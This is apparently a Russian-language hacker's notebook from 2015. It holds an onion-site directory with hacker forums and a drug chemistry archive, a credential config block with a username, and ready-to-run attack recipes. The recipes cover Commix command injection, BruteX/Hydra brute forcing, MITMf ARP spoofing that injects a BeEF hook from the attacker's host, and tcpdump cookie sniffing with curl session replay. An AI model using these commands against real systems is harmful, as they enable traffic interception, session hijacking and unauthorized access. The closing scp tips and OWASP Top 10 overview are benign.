http://wi7qkxyrdpu5cmvr.onion - Autistici/Inventati, различные сервисы от гражданских активистов из Италии
http://cyjabr4pfzupo7pg.onion - CYRUSERV, jabber-сервис от CYRUSERV
http://giyvshdnojeivkom.onion - securejabber.me, onion-зеркало для jabber-сервиса securejabber.me
http://libertygb2nyeyay.onion - LibertyHackers, jabber-сервис от The Liberty Hackers Network
http://strngbxhwyuu37a3.onion - Strongbox, сервис для анонимной передачи документов журналу The New Yorker

Каталоги сайтов, зеркала и аналоги The Hidden Wiki

http://doe6ypf2fcyznaq5.onion - Runion Wiki, каталог ссылок и материалы с Runion
http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page - The Hidden Wiki, старейший каталог .onion-ресурсов, рассадник мошеннических ссылок
https://www.reddit.com/r/onions - clearnet (!) /r/onions, обзор сайтов в .onion-land
http://torlinkbgs6aabns.onion - TORLINKS, модерируемый каталог .onion-ссылок
http://dirnxxdraygbifgc.onion - OnionDir, модерируемый каталог ссылок с возможностью добавления
http://skunksworkedp2cg.onion - Harry71, робот-проверяльщик доступности .onion-сайтов

Поиск

http://3g2upl4pq6kufc4m.onion - DuckDuckGo, поиск в Интернете
http://xmh57jrzrnw6insl.onion - TORCH, поиск внутри .onion
http://hss3uro2hsxfogfq.onion - TorSearch, поиск внутри .onion

Proxy

https://tor2web.org - clearnet (!) tor2web, просмотр скрытых onion-сайтов без Tor
https://torstorm.org - clearnet (!) torstorm, просмотр скрытых onion-сайтов без Tor

Хостинг изображений, сайтов и прочего

http://imgbifwwqoixh7te.onion - img.bi, хостинг изображений, с зеркалом в clearnet и открытым кодом (нужен JS)
http://infotombjhy7tcrg.onion - InfoTomb, хостинг различных файлов и текстовой информации с зеркалом в clearnet
http://yiy4ksveqrax675y.onion - Onion Upload, хостинг файлов
http://twlba5j7oo5g4kj5.onion - Image Hosting, хостинг картинок
http://imagexutrag65hxl.onion - Free Image Hosting, хостинг картинок
http://matrixtxri745dfw.onion - Matrix Trilogy, хостинг картинок
http://postits4tga4cqts.onion - Post It, onion аналог Pastebin и Privnote
http://54ogum7gwxhtgiya.onion/insertor - InserTor, onion аналог Pastebin и Privnote

Форумы, общение

http://zw3crggtadila2sg.onion/imageboard - TorChan, "Tor's #1 imageboard"
http://facebookcorewwwi.onion - Facebook, тот самый
http://nco5ranerted3nkt.onion - ToRepublic forum, форум на польском языке
http://libertyy56ecbupa.onion/Forum/ - LibertyHackers, форум хакеров на французском языке
http://oi4bvjslpt5gabjq.onion - République de Hackers, еще один форум хакеров на французском языке

Библиотеки, архивы

http://kpynyvym6xqi7wz2.onion - ParaZite, "Anarchy files and Underground links"
http://flibustahezeous3.onion - Флибуста, зеркало flibusta.net
http://rhodiumio4b7b4rm.onion - Rhodium, Drug Chemistry Archive

24.06.2015

22.06.2015

fenet-install-FE

fenet dti mil service type CMS username S_355950 password xxx
fenet dti mil service type DTI username S_355950 password xxx
fenet dti source type CDN username S_355950 password xxx
fenet dti source type CMS username S_355950 password xxx
fenet dti source type DTI username S_355950 password xxx
fenet dti upload destination type CMS username S_355950 password xxx
fenet dti upload destination type DTI username S_355950 password xxx
fenet user S_355950 password xxx

21.06.2015

Commix the Command Injection tool

#git clone https://github.com/stasinopoulos/commix.git
#./commix --url="http://192.168.168.12/example1.php?ip=INJECT_HERE"


Beef install/config

root@kali:/# apt-get update
root@kali:/# apt-get install beef-xss

  • #nano /usr/share/beef-xss/config.yaml
.....
metasploit:
enable: true
.....

  • #nano /usr/share/beef-xss/extensions/metasploit/config.yaml

BruteX

#git clone https://github.com/1N3/BruteX.git

root@n0name:~/BruteX# ./brutex 192.168.168.112

################################### Running Brute Force ############################
 + -- --=[Port 21 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes...... :)

MITMF - inject plugin - Beef Hook

Start Beef:
root@n0name:/usr/share/beef-xss# ./beef

#git clonehttps://github.com/byt3bl33d3r/MITMf.git
./kali_setup.sh

#./mitmf.py -i eth2 --arp --spoof --gateway 192.168.168.1 --target 192.168.168.109 --inject --js-url http://192.168.168.111:3000/hook.js

....and go to http://192.168.222.128:3000/ui/panel


20.06.2015

Tcpdump Cookie

# tcpdump -i eth1 host target.com -s 0 -w - -l 2>/dev/null | grep -ai -m 1 ^Cookie

.......
Cookie: ctime=2147483; PHPSESSID=6a87410c0a65ed057e4d449cc3015cda;
.......

# curl -b "ctime=2147483; PHPSESSID=6a87410c0a65ed057e4d449cc3015cda;" target.com

16.06.2015

SCP tip

Скопировать локальный файл на сервер:
scp file.gz root@server.my:/home/dir

Скопировать всё содержимое папки на сервере (рекурсивно) в локальную папку (с подробным выводом):
scp -r root@server.my:/home/dir/ /home/local/my/

Между серверами:
scp -r root@server1.my:/home/dir/ root@server2.my:/home/dir/

С указанием порта:scp -P 9999 file.zip user@server.my:~/
Дополнительные флаги
-r - рекурсивное копирование (для директорий)
-C - использовать сжатие при передачи
-P - порт ssh

Сценарии. OWASP

Существует несколько сценариев, по которым можно проверить сайт на наличие той или иной уязвимости в автоматическом режиме за достаточно короткий промежуток времени.

Тип уязвимости: внедрение кода — OWASP A1 (injection).
Как выявляется: ошибки в теле страницы, время отклика.
Чем грозит: компрометация пользовательских данных, заражение сайта.

Тип уязвимости: некорректная аутентификация и управление сессией — OWASP A2 (broken authentication and session management).
Как выявляется: передача сессии в URL, отсутствие шифрования.
Чем грозит: утечка чужой сессии может привести к перехвату управления аккаунтом.

Тип уязвимости: межсайтовый скриптинг — OWASP A3 XSS (cross-site scripting).Как выявляется: наличие ответа на специально сформированный запрос в коде страницы.
Чем грозит: атака производится непосредственно на пользователя, манипуляция данными.

Тип уязвимости: небезопасные прямые ссылки на объекты — OWASP A4 (insecure direct object references).
Как выявляется: перебор значения параметров.
Чем грозит: возможна утечка критичных данных

Тип уязвимости: небезопасная конфигурация — OWASP A5 (security misconfiguration).
Как выявляется: выявление настроек по умолчанию, стандартных паролей, сообщений об ошибках.
Чем грозит: компрометация пользовательских данных, заражение сайта.

Тип уязвимости: утечка чувствительных данных — OWASP A6 (sensitive data exposure).
Как выявляется: корректная установка и настройка сертификатов, выявление критичных данных.
Чем грозит: возможна утечка критичных данных.

Тип уязвимости: отсутствие контроля доступа к функциональному уровню — OWASP A7 (missing function level access control).
Как выявляется: манипуляция данными для получения доступа.
Чем грозит: возможна утечка критичных данных.

Тип уязвимости: подделка межсайтовых запросов — OWASP A8 CSRF (cross-site request forgery).
Как выявляется: отсутствие проверки адреса запроса (токена).
Чем грозит: манипуляция данными.

Тип уязвимости: использование компонентов с известными уязвимостями — OWASP A9 (using components with known vulnerabilities).
Как выявляется: наличие общедоступных уявивмостей для данной версии приложения.
Чем грозит: компрометация пользовательских данных, заражение сайта.

Тип уязвимости: невалидируемые редиректы — OWASP A10 (unvalidated redirects and forwards).
Как выявляется: манипуляция параметрами URL.
Чем грозит: компрометация пользовательских данных, возможна утечка критичных данных.

Выявленные уязвимости могут быть проэксплуатированы как по отдельности, так и составить сложный сценарий атаки на веб-приложение.